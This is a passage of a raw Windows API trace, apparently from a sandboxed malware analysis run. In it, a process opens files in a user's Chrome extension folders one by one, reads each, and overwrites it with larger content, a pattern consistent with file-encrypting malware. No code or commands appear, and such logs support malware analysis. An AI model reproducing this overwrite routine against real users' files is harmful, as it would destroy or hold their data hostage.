lpUsedDefaultChar=0x0) returned 13 [0161.800] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eeb308, nNumberOfBytesToRead=0xf5, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb308*, lpNumberOfBytesRead=0x331f2bc*=0xf5, lpOverlapped=0x0) returned 1 [0161.801] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.801] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x67d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x331f2d0*=0x67d, lpOverlapped=0x0) returned 1 [0161.801] CloseHandle (hObject=0x1dc) returned 1 [0161.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.803] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.803] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xd5 [0161.803] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.804] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.804] ReleaseMutex (hMutex=0x168) returned 1 [0161.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.804] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c4f58, nNumberOfBytesToRead=0xd5, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4f58*, lpNumberOfBytesRead=0x331f2bc*=0xd5, lpOverlapped=0x0) returned 1 [0161.805] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.805] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x65d, lpOverlapped=0x0) returned 1 [0161.805] CloseHandle (hObject=0x1dc) returned 1 [0161.805] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.806] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.806] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x10a [0161.806] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.806] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.806] ReleaseMutex (hMutex=0x168) returned 1 [0161.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.806] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ef2258, nNumberOfBytesToRead=0x10a, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2258*, lpNumberOfBytesRead=0x331f2bc*=0x10a, lpOverlapped=0x0) returned 1 [0161.808] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.808] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x692, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x331f2d0*=0x692, lpOverlapped=0x0) returned 1 [0161.808] CloseHandle (hObject=0x1dc) returned 1 [0161.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.809] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.809] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1378 [0161.809] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.809] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.809] ReleaseMutex (hMutex=0x168) returned 1 [0161.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="128.png", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0161.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="128.png", cchWideChar=7, lpMultiByteStr=0x1f7ad44, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="128.png", lpUsedDefaultChar=0x0) returned 7 [0161.809] ReadFile (in: hFile=0x1dc, lpBuffer=0x286eab8, nNumberOfBytesToRead=0x1378, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286eab8*, lpNumberOfBytesRead=0x331f2bc*=0x1378, lpOverlapped=0x0) returned 1 [0162.206] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.206] WriteFile (in: hFile=0x1dc, lpBuffer=0x25abb78*, nNumberOfBytesToWrite=0x1900, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25abb78*, lpNumberOfBytesWritten=0x331f2d0*=0x1900, lpOverlapped=0x0) returned 1 [0162.206] CloseHandle (hObject=0x1dc) returned 1 [0162.207] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.209] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.209] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xed [0162.209] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.209] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.209] ReleaseMutex (hMutex=0x168) returned 1 [0162.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.210] ReadFile (in: hFile=0x1dc, lpBuffer=0x2697608, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697608*, lpNumberOfBytesRead=0x331f2bc*=0xed, lpOverlapped=0x0) returned 1 [0162.211] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.211] WriteFile (in: hFile=0x1dc, lpBuffer=0x3d0fb48*, nNumberOfBytesToWrite=0x675, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb48*, lpNumberOfBytesWritten=0x331f2d0*=0x675, lpOverlapped=0x0) returned 1 [0162.211] CloseHandle (hObject=0x1dc) returned 1 [0162.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.213] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.213] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x12a [0162.213] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.213] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.214] ReleaseMutex (hMutex=0x168) returned 1 [0162.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.214] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f1d0a8, nNumberOfBytesToRead=0x12a, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f1d0a8*, lpNumberOfBytesRead=0x331f2bc*=0x12a, lpOverlapped=0x0) returned 1 [0162.374] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.374] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6b2, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x331f2d0*=0x6b2, lpOverlapped=0x0) returned 1 [0162.375] CloseHandle (hObject=0x1dc) returned 1 [0162.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.377] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.377] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xb7 [0162.377] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.377] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.377] ReleaseMutex (hMutex=0x168) returned 1 [0162.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.377] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ee0438, nNumberOfBytesToRead=0xb7, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0438*, lpNumberOfBytesRead=0x331f2bc*=0xb7, lpOverlapped=0x0) returned 1 [0162.379] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.379] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63f, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x63f, lpOverlapped=0x0) returned 1 [0162.379] CloseHandle (hObject=0x1dc) returned 1 [0162.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.380] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.380] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xc6 [0162.380] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.380] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.380] ReleaseMutex (hMutex=0x168) returned 1 [0162.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.381] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ed1758, nNumberOfBytesToRead=0xc6, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1758*, lpNumberOfBytesRead=0x331f2bc*=0xc6, lpOverlapped=0x0) returned 1 [0162.382] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.382] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x64e, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x64e, lpOverlapped=0x0) returned 1 [0162.386] CloseHandle (hObject=0x1dc) returned 1 [0162.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.388] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.388] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x25f [0162.388] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.388] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.388] ReleaseMutex (hMutex=0x168) returned 1 [0162.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.388] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x25f, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x331f2bc*=0x25f, lpOverlapped=0x0) returned 1 [0162.400] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.400] WriteFile (in: hFile=0x1dc, lpBuffer=0x27e0038*, nNumberOfBytesToWrite=0x7e7, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x27e0038*, lpNumberOfBytesWritten=0x331f2d0*=0x7e7, lpOverlapped=0x0) returned 1 [0162.401] CloseHandle (hObject=0x1dc) returned 1 [0162.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.402] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.402] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x12c [0162.403] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.403] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.403] ReleaseMutex (hMutex=0x168) returned 1 [0162.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.403] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f1d0a8, nNumberOfBytesToRead=0x12c, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f1d0a8*, lpNumberOfBytesRead=0x331f2bc*=0x12c, lpOverlapped=0x0) returned 1 [0162.404] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0162.404] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6b4, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x331f2d0*=0x6b4, lpOverlapped=0x0) returned 1 [0162.404] CloseHandle (hObject=0x1dc) returned 1 [0162.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0162.406] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.406] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xaf [0162.406] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0162.406] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.406] ReleaseMutex (hMutex=0x168) returned 1 [0162.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.407] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f37818, 